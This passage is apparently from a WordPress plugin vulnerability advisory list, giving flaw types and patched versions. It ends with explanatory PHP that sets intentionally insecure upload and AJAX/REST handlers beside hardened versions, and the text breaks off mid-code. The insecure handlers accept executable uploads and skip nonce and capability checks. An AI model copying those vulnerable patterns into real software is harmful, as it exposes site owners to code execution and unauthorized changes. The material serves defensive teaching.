Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Top Bar

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.4
Recommended Action: Update to version 3.0.4, or a newer patched version

Plugin: wSecure Lite

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.2.0
Recommended Action: Update to version 3.2.0, or a newer patched version

Plugin: DSGVO All in one for WP

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: Advanced Local Pickup for WooCommerce

Vulnerability: Missing Authorization
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Lazy Load

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 0.6.1
Recommended Action: Update to version 0.6.1, or a newer patched version

Plugin: Campaign URL Builder

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting via Create Link
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Autotitle for WordPress

Vulnerability: Cross-Site Request Forgery to Settings Update and Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Smash Balloon Social Photo Feed – Easy Social Feeds Plugin

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Rezgo Online Booking

Vulnerability: Cross-Site Scripting
Patched Version: 1.8.2
Recommended Action: Update to version 1.8.2, or a newer patched version

Plugin: Telephone Number Linker

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Link Juice Keeper

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.0.3
Recommended Action: Update to version 2.0.3, or a newer patched version

Plugin: Audio Merchant

Vulnerability: Cross-Site Request Forgery to Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Facebook Members

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.0.5
Recommended Action: Update to version 5.0.5, or a newer patched version

Plugin: WP Media Cleaner

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: WooCommerce Square

Vulnerability: Missing Authorization via multiple AJAX actions
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: WPML

Vulnerability: Cross-Site Scripting in Accept-Language Header
Patched Version: 3.2.7
Recommended Action: Update to version 3.2.7, or a newer patched version

Plugin: Export All URLs

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.6
Recommended Action: Update to version 4.6, or a newer patched version

Plugin: Form Vibes – Database Manager for Forms

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.4.6
Recommended Action: Update to version 1.4.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Missing Authorization
Patched Version: 3.1.18
Recommended Action: Update to version 3.1.18, or a newer patched version

Plugin: Admin Columns

Vulnerability: No subtitle
Patched Version: 4.3
Recommended Action: Update to version 4.3, or a newer patched version

Plugin: ADIF Log Search Widget

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: SEOPress – On-site SEO

Vulnerability: Authenticated (Administrator+) PHP Object Injection
Patched Version: 6.5.0.3
Recommended Action: Update to version 6.5.0.3, or a newer patched version

Plugin: Slideshow Gallery LITE

Vulnerability: Arbitrary File Upload
Patched Version: 1.4.7
Recommended Action: Update to version 1.4.7, or a newer patched version

Plugin: Scoutnet Kalender

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Videos sync PDF

Vulnerability: Unauthenticated Local File Inclusion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Recip.ly Plugin

Vulnerability: Unauthenticated Arbitrary File Upload in uploadImage.php
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Duplicator – Backups & Migration Plugin – Cloud Backups, Scheduled Backups, & More

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 0.5.28
Recommended Action: Update to version 0.5.28, or a newer patched version

Plugin: Jetpack – WP Security, Backup, Speed, & Growth

Vulnerability: Cross-Site Scripting via LaTeX markup within HTML elements
Patched Version: 3.9.2
Recommended Action: Update to version 3.9.2, or a newer patched version

Plugin: Breadcrumbs by menu

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: Woody code snippets – Insert Header Footer Code, AdSense Ads

Vulnerability: Arbitrary Post Deletion
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Simple Ajax Chat – Add a Fast, Secure Chat Box

Vulnerability: Cross-Site Request Forgery
Patched Version: 20220216
Recommended Action: Update to version 20220216, or a newer patched version

Plugin: Appointment Calendar

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: affiliate-toolkit – WP Affiliate Plugin with Amazon

Vulnerability: Open Redirect via atkpout.php
Patched Version: 3.4.0
Recommended Action: Update to version 3.4.0, or a newer patched version

Plugin: Panda Pods Repeater Field

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.4
Recommended Action: Update to version 1.5.4, or a newer patched version

Plugin: WP-Testimonials

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: SQL Injection
Patched Version: 4.0.7
Recommended Action: Update to version 4.0.7, or a newer patched version

Plugin: WPForms – Easy Form Builder for WordPress – Contact Forms, Payment Forms, Surveys, & More

Vulnerability: Cross-Site Scripting
Patched Version: 1.6.0.2
Recommended Action: Update to version 1.6.0.2, or a newer patched version

Plugin: Tickera – WordPress Event Ticketing

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.4.8.3
Recommended Action: Update to version 3.4.8.3, or a newer patched version

Plugin: Vertical marquee plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Portfolio Responsive Gallery

Vulnerability: Cross-Site Scripting
Patched Version: 1.1.8
Recommended Action: Update to version 1.1.8, or a newer patched version

Plugin: Social Auto Poster

Vulnerability: Cross-Site Request Forgery to Plugin Settings Reset
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Pagebar2

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: 2.66
Recommended Action: Update to version 2.66, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.0.2
Recommended Action: Update to version 2.0.2, or a newer patched version

Plugin: Stock Ticker

Vulnerability: Reflected Cross-Site Scripting in ajax_stockticker_load
Patched Version: 3.23.4
Recommended Action: Update to version 3.23.4, or a newer patched version

Plugin: ALO EasyMail Newsletter

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.9.3
Recommended Action: Update to version 2.9.3, or a newer patched version

Plugin: Realia

Vulnerability: Cross-Site Request Forgery to User Email Change
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: DeepL API translation plugin

Vulnerability: Sensitive Information Disclosure
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Ultimate Taxonomy Manager

Vulnerability: Unauthenticated Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: visitor-maps

Vulnerability: Stored Cross-Site Scripting
Patched Version: 1.5.8.7
Recommended Action: Update to version 1.5.8.7, or a newer patched version

Plugin: 3CX Free Live Chat, Calls & WhatsApp

Vulnerability: Blind SQL Injection
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Plugin: Rich Counter

Vulnerability: JavaScript Injection
Patched Version: 1.2.0
Recommended Action: Update to version 1.2.0, or a newer patched version

Plugin: Youtube Channel Gallery

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Connections Business Directory

Vulnerability: Cross-Site Scripting
Patched Version: 8.5.9
Recommended Action: Update to version 8.5.9, or a newer patched version

Plugin: Floating Chat Widget: Contact Chat Icons, Telegram Chat, Line Messenger, WeChat, Email, SMS, Call Button, WhatsApp – Chaty

Vulnerability: Chaty <= 2.8.2 Reflected Cross-Site Scripting
Patched Version: 2.8.3
Recommended Action: Update to version 2.8.3, or a newer patched version

Plugin: WhyDoWork AdSense

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Kanban Boards for WordPress

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ReviewX – WooCommerce Product Reviews with Multi-Criteria, Reminder Emails, Google Reviews, Schema & More

Vulnerability: Authenticated (Subscriber+) SQL Injection
Patched Version: 1.6.9
Recommended Action: Update to version 1.6.9, or a newer patched version

Plugin: Gutenberg Block Editor Toolkit – EditorsKit

Vulnerability: Authenticated (Contributor+) Code Injection
Patched Version: 1.31.6
Recommended Action: Update to version 1.31.6, or a newer patched version

Plugin: Complianz – GDPR/CCPA Cookie Consent

Vulnerability: GDPR/CCPA Cookie Consent <= 6.4.4
Patched Version: 6.4.5
Recommended Action: Update to version 6.4.5, or a newer patched version

Plugin: Yatra – Tour and Travel Booking Solution

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.1.15
Recommended Action: Update to version 2.1.15, or a newer patched version

Plugin: MainWP Broken Link Checker

Vulnerability: Unauthenticated SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Redux Framework

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.1.21
Recommended Action: Update to version 4.1.21, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Missing Authorization Checks
Patched Version: 6.1.5
Recommended Action: Update to version 6.1.5, or a newer patched version

Plugin: Schema & Structured Data for WP & AMP

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.24
Recommended Action: Update to version 1.24, or a newer patched version

Plugin: WP eCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.9.1
Recommended Action: Update to version 3.8.9.1, or a newer patched version

Plugin: MailPoet – Newsletters, Email Marketing, and Automation

Vulnerability: Reflected Cross-Site Scripting via URL parameter
Patched Version: 3.23.2
Recommended Action: Update to version 3.23.2, or a newer patched version

Plugin: Membership Simplified

Vulnerability: SQL Injection
Patched Version: 1.58
Recommended Action: Update to version 1.58, or a newer patched version

Plugin: Who Hit The Page – Hit Counter

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Restaurant & Cafe Addon for Elementor

Vulnerability: Missing Authorization
Patched Version: 1.5.3
Recommended Action: Update to version 1.5.3, or a newer patched version

Plugin: Configurable Tag Cloud (CTC)

Vulnerability: Cross-Site Request Forgery via ctc_options_page()
Patched Version: 5.3
Recommended Action: Update to version 5.3, or a newer patched version

Plugin: File Manager

Vulnerability: Missing Authorization on AJAX Actions
Patched Version: 4.9
Recommended Action: Update to version 4.9, or a newer patched version

Plugin: UTM Tracker

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress

Vulnerability: Authenticated Cross-Site Scripting in Youtube URL Embeds
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Smart SEO Tool – SEO优化插件

Vulnerability: Cross-Site Request Forgery via ‘wp_ajax_wb_smart_seo_tool’
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: Custom Field Suite

Vulnerability: Missing Authorization
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Web3 – Crypto wallet Login & NFT token gating

Vulnerability: Authentication Bypass
Patched Version: 3.0.0
Recommended Action: Update to version 3.0.0, or a newer patched version

Plugin: Download Manager

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 3.2.62
Recommended Action: Update to version 3.2.62, or a newer patched version

Plugin: WP Users Media

Vulnerability: Cross-Site Request Forgery in wpusme_save_settings
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Gecka Terms Thumbnails

Vulnerability: Authenticated (Subscriber+) PHP Object Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Note Press

Vulnerability: SQL Injection
Patched Version: 0.1.2
Recommended Action: Update to version 0.1.2, or a newer patched version

Plugin: Image Slider by NextCode – Photo & Video Slider

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Zedna eBook download

Vulnerability: Directory Traversal
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Icegram Engage – Ultimate WP Popup Builder, Lead Generation, Optins, and CTA

Vulnerability: Reflected Cross-Site Scripting via message_id
Patched Version: 2.0.5
Recommended Action: Update to version 2.0.5, or a newer patched version

Plugin: Two-factor authentication (formerly IP Vault)

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 2.1
Recommended Action: Update to version 2.1, or a newer patched version

Plugin: LearnDash LMS

Vulnerability: Reflected Cross-Site Scripting issue on the [ld_profile] search field
Patched Version: 3.1.2
Recommended Action: Update to version 3.1.2, or a newer patched version

Plugin: Insert Special Characters

Vulnerability: Improper Input Validation
Patched Version: 1.0.5
Recommended Action: Update to version 1.0.5, or a newer patched version

Plugin: Meow Gallery

Vulnerability: SQL Injection
Patched Version: 4.1.9
Recommended Action: Update to version 4.1.9, or a newer patched version

Plugin: wpForo Forum

Vulnerability: Authenticated (Subscriber+) Arbitrary File Upload
Patched Version: 2.1.0
Recommended Action: Update to version 2.1.0, or a newer patched version

Plugin: AdRotate Banner Manager – The only ad manager you'll need

Vulnerability: Authenticated Stored Cross-Site Scripting via Group Names
Patched Version: 5.8.23
Recommended Action: Update to version 5.8.23, or a newer patched version

Plugin: SupportCandy – Helpdesk & Customer Support Ticket System

Vulnerability: Sensitive Data Exposure
Patched Version: 3.1.4
Recommended Action: Update to version 3.1.4, or a newer patched version

Plugin: SlimStat Analytics

Vulnerability: Authenticated (Contributor+) Blind SQL Injection via Shortcode
Patched Version: 5.0.10
Recommended Action: Update to version 5.0.10, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.6.7
Recommended Action: Update to version 5.6.7, or a newer patched version

Plugin: WP Human Resource Management

Vulnerability: Sensitive Information Disclosure
Patched Version: 2.2.6
Recommended Action: Update to version 2.2.6, or a newer patched version

Plugin: Crafty Social Buttons

Vulnerability: Cross-Site Scripting
Patched Version: 1.5.8
Recommended Action: Update to version 1.5.8, or a newer patched version

Plugin: CopySafe Web Protection

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 3.14
Recommended Action: Update to version 3.14, or a newer patched version

Plugin: Anti-Malware Security and Brute-Force Firewall

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 4.21.83
Recommended Action: Update to version 4.21.83, or a newer patched version

Plugin: Block wp-login

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: WappPress – Create Mobile App for any WordPress site with our Mobile App Builder in just 1 minute

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 6.0.0
Recommended Action: Update to version 6.0.0, or a newer patched version

Plugin: Membership Database

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Contact Form Plugin

Vulnerability: Stored Cross-Site Scripting
Patched Version: 4.0.2
Recommended Action: Update to version 4.0.2, or a newer patched version

Plugin: WP Fastest Cache

Vulnerability: Directory Traversal
Patched Version: 0.8.9.6
Recommended Action: Update to version 0.8.9.6, or a newer patched version

Plugin: Custom Post Type UI

Vulnerability: Cross-Site Request Forgery to Stored Cross-Site Scripting
Patched Version: 1.7.4
Recommended Action: Update to version 1.7.4, or a newer patched version

Plugin: WP Cerber Security, Anti-spam & Malware Scan

Vulnerability: User Enumeration Bypass
Patched Version: 9.1
Recommended Action: Update to version 9.1, or a newer patched version

Plugin: Patreon WordPress

Vulnerability: Local File Disclosure
Patched Version: 1.7.0
Recommended Action: Update to version 1.7.0, or a newer patched version

Plugin: Tab Ultimate

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: WPQA – Builder forms Addon For WordPress

Vulnerability: Builder forms Addon For WordPress < 5.2
Patched Version: 5.2
Recommended Action: Update to version 5.2, or a newer patched version

Plugin: Opensea

Vulnerability: Cross-Site Scripting
Patched Version: 1.0.3
Recommended Action: Update to version 1.0.3, or a newer patched version

Plugin: PictoBrowser

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Email Subscribers by Icegram Express – Affordable, Powerful Email Marketing for WordPress & WooCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 3.5.0
Recommended Action: Update to version 3.5.0, or a newer patched version

Plugin: WooCommerce Checkout & Funnel Builder by CartFlows – Create High Converting Stores For WooCommerce

Vulnerability: Authenticated Stored Cross-Site Scripting via FB Pixel ID and Google Analytics ID
Patched Version: 1.6.13
Recommended Action: Update to version 1.6.13, or a newer patched version

Core: WordPress MU

Vulnerability: Arbitrary File Upload
Patched Version: 1.2.4
Recommended Action: Update to version 1.2.4, or a newer patched version

Plugin: Emails & Newsletters with Jackmail

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Syncee Collective Dropshipping

Vulnerability: Missing Authorization
Patched Version: 1.0.10
Recommended Action: Update to version 1.0.10, or a newer patched version

Plugin: Open User Map

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.3.27
Recommended Action: Update to version 1.3.27, or a newer patched version

Plugin: Social Buttons Pack by BestWebSoft

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: JS Multi Hotel

Vulnerability: Full Path Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ditty – Responsive News Tickers, Sliders, and Lists

Vulnerability: Missing Authorization via save_ditty_permissions_check
Patched Version: 3.1.25
Recommended Action: Update to version 3.1.25, or a newer patched version

Plugin: WPML

Vulnerability: SQL Injection via lang Parameter
Patched Version: 3.1.9.1
Recommended Action: Update to version 3.1.9.1, or a newer patched version

Plugin: WCFM Membership – WooCommerce Memberships for Multivendor Marketplace

Vulnerability: Unauthenticated Privilege Escalation
Patched Version: 2.10.1
Recommended Action: Update to version 2.10.1, or a newer patched version

Plugin: WP-Lister Lite for Amazon

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.4.3
Recommended Action: Update to version 2.4.3, or a newer patched version

Plugin: WP Booking Calendar

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 9.7.4
Recommended Action: Update to version 9.7.4, or a newer patched version

Plugin: WP FEvents Book

Vulnerability: Authenticated (Subscriber+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Shortcode IMDB

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: ooorl

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: BulletProof Security

Vulnerability: Cross-Site Scripting
Patched Version: .51.1
Recommended Action: Update to version .51.1, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.6.0
Recommended Action: Update to version 4.6.0, or a newer patched version

Plugin: WP Hide & Security Enhancer

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.8
Recommended Action: Update to version 1.8, or a newer patched version

Plugin: Sermon’e – Sermons Online

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Cross-Site Request Forgery to Setting Modification
Patched Version: 4.0.4
Recommended Action: Update to version 4.0.4, or a newer patched version

Plugin: Generate Images (AI) – Magic Post Thumbnail

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.1.11
Recommended Action: Update to version 4.1.11, or a newer patched version

Plugin: User Meta – User Profile Builder and User management plugin

Vulnerability: Arbitrary File Upload
Patched Version: 1.1.2
Recommended Action: Update to version 1.1.2, or a newer patched version
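Arbitrary File Upload appears several times in this list (User Meta here, and later Autoptimize, Gmedia Photo Gallery, Complete Gallery Manager, Magn WP Drag And Drop Media Uploader, Xerte Online and AI Engine). In a PHP application it is usually a direct path to code execution, because a file stored under the web root with a `.php` extension is executed on the next request for its URL. The following is an added illustration written for this page, not code from any of those plugins; the form field name, capability and directory are hypothetical, and a WordPress runtime is assumed.

```php
<?php
/**
 * Added illustration of the Arbitrary File Upload class, not code from any
 * listed plugin. The field name 'avatar', the subdirectory and the capability
 * choice are hypothetical. Assumes a WordPress runtime.
 */

// Vulnerable: trusts the client-supplied filename and writes wherever it points.
// A name such as shell.php (or shell.phtml, or a traversal like ../../x.php)
// ends up web-reachable under uploads/ and runs as the web server user.
function demo_save_avatar_vulnerable() {
    $dest = wp_upload_dir()['basedir'] . '/avatars/' . $_FILES['avatar']['name'];
    move_uploaded_file( $_FILES['avatar']['tmp_name'], $dest );
    return $dest;
}

// Hardened: authorization and nonce first, then delegate to core.
// wp_handle_upload() with an explicit 'mimes' allow-list calls
// wp_check_filetype_and_ext(), which matches the file's real content against its
// extension, rejects anything not on the list and stores it under a sanitized,
// unique name inside the uploads directory.
function demo_save_avatar_hardened() {
    check_admin_referer( 'demo_avatar_upload' );
    if ( ! current_user_can( 'upload_files' ) ) {
        wp_die( 'forbidden', 403 );
    }
    if ( empty( $_FILES['avatar'] ) || UPLOAD_ERR_OK !== $_FILES['avatar']['error'] ) {
        wp_die( 'no file', 400 );
    }
    require_once ABSPATH . 'wp-admin/includes/file.php';
    $result = wp_handle_upload( $_FILES['avatar'], array(
        'test_form' => false,
        'mimes'     => array(
            'jpg|jpeg' => 'image/jpeg',
            'png'      => 'image/png',
            'gif'      => 'image/gif',
        ),
    ) );
    if ( isset( $result['error'] ) ) {
        wp_die( esc_html( $result['error'] ), 400 );
    }
    // $result['file'] is the on-disk path, $result['url'] the public URL.
    return $result;
}
```

Two things to verify on an affected site even after patching: list the uploads tree for files whose extension the server will execute (`find wp-content/uploads -name '*.php*'` is the usual first pass), and confirm the web server does not execute PHP under `wp-content/uploads/` at all, which limits the blast radius of the next upload bug.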

Plugin: Wicked Folders

Vulnerability: Cross-Site Request Forgery via ajax_add_folder
Patched Version: 2.18.17
Recommended Action: Update to version 2.18.17, or a newer patched version
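The Wicked Folders entry ("Cross-Site Request Forgery via ajax_add_folder") and the Ditty entry above ("Missing Authorization via save_ditty_permissions_check") are two faces of one mistake in a WordPress action handler: a privileged write that is not tied to a nonce (so another origin can make a logged-in administrator's browser submit it) or not tied to a capability (so any logged-in user can call it). The same pattern is behind the later "Missing Authorization via AJAX actions" and "Missing Authorization on REST Route" entries. The following is an added illustration written for this page, not code from any of those plugins; the action, option and route names are hypothetical, and a WordPress runtime is assumed.

```php
<?php
/**
 * Added illustration of the CSRF / missing-authorization class.
 * Not code from Wicked Folders, Ditty or any listed plugin: the action name
 * demo_add_folder, the option demo_folders and the REST route are hypothetical.
 * Assumes a WordPress runtime.
 */

// Vulnerable: reachable by every logged-in user, with no nonce and no
// capability check. Any Subscriber can call it directly (missing authorization)
// and a page on another origin can submit it with an administrator's cookies (CSRF).
function demo_add_folder_vulnerable() {
    $folders   = get_option( 'demo_folders', array() );
    $folders[] = sanitize_text_field( wp_unslash( $_POST['name'] ) );
    update_option( 'demo_folders', $folders );
    wp_send_json_success( $folders );
}

// Hardened: three independent gates, in this order.
//   1. check_ajax_referer() rejects requests without a nonce issued to this
//      user for this action, which defeats CSRF.
//   2. current_user_can() ties the action to a capability, not to being logged in.
//   3. Input is validated before it is stored.
function demo_add_folder_hardened() {
    check_ajax_referer( 'demo_add_folder', 'nonce' );   // sends 403 and exits on failure
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $name = isset( $_POST['name'] ) ? sanitize_text_field( wp_unslash( $_POST['name'] ) ) : '';
    if ( '' === $name || strlen( $name ) > 64 ) {
        wp_send_json_error( 'invalid name', 400 );
    }
    $folders   = get_option( 'demo_folders', array() );
    $folders[] = $name;
    update_option( 'demo_folders', $folders );
    wp_send_json_success( $folders );
}
add_action( 'wp_ajax_demo_add_folder', 'demo_add_folder_hardened' );
// Deliberately no wp_ajax_nopriv_ registration: anonymous callers have no
// business here. Registering both hooks is how "Unauthenticated" variants arise.

// What the JavaScript caller must be given: a nonce issued per user and per action.
function demo_folder_nonce_for_js() {
    return array(
        'url'   => admin_url( 'admin-ajax.php' ),
        'nonce' => wp_create_nonce( 'demo_add_folder' ),
    );
}

// Same principle on the REST API: permission_callback is the authorization gate.
// Returning '__return_true' here for a write endpoint reproduces the
// "Missing Authorization on REST Route" class.
add_action( 'rest_api_init', function () {
    register_rest_route( 'demo/v1', '/folders', array(
        'methods'             => 'POST',
        'callback'            => function ( WP_REST_Request $req ) {
            $folders   = get_option( 'demo_folders', array() );
            $folders[] = $req->get_param( 'name' );
            update_option( 'demo_folders', $folders );
            return rest_ensure_response( $folders );
        },
        'permission_callback' => function () {
            return current_user_can( 'manage_options' );
        },
        'args'                => array(
            'name' => array(
                'required'          => true,
                'type'              => 'string',
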